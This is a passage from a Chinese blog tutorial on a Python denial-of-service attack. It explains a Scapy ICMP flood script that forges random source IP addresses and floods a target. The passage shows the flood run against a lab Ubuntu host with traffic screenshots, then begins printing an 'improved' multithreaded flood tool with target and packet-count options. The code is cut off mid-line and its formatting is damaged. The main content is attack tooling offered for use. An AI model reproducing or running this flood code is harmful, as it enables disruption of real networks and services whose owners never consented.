python网络渗透之:DOS攻击篇_ddos攻击脚本

if name == ‘main’:
main()


* 可以看到我们在代码中,使用`create_ip()`来随机生成源ip地址来伪造ip,
* 然后在`ICMP_FLOOD()`来发起攻击,在这个函数里我们构造了IP/ICMP的数据包,使用for循环来发送指定的包次。
* 最后在main()函数中调用来实现攻击。


我们本次以Ubuntu这台机器为攻击目标,IP地址是:192.168.64.140,我们通过`iftop`来监测网络流量数据


我们来看看效果:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/4f26d3ffd4de4fe793de97680f128078.png#pic_center)


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/56bd3fc04a8345209a76f8f218352f2f.png#pic_center)


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/1f2ad9c2b13c466abcefc6e78a6befc3.png#pic_center)


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/d7f8a522965840a0bbd8082bff984881.png#pic_center)


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/b59a9aca1e904d1782db8b6b553172b8.png#pic_center)


可以看到,随着我们发的包越来越多,iftop的检测数据的条也就越来越长,相应的数据大小也有明显的变化。


**以下是改进之后的ICMP Flood DOS python代码:**



from scapy.all import *;
from scapy.layers.inet import *
from random import randint,choice
from threading import Thread
import time

data_package_number = 0

class IFD():
def init(self):
pass
def icmp_dos_log(self):
log =“”"
___ ____ __ __ ____ ____ ___ ____ options:
|_ / | / | _ \ | _ \ / _ / | --appoint ip:
| | | | |/| | |
) | | | | | | | _
\ -d >> -d[objective ip]
| | |
| | | | __/ | |
| | || |) | --appoint send package number(recommend even):
|
_|| ||| |/ ___/|_/ -o >> -o[number]
-------------------------------
version: v_1.1 developer: hare
-------------------------------
“”"
return log

def create_ip(self):
    from ipaddress import ip_network
    self.ip_pool = []
    r_ip = ip_network(f"{randint(0,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值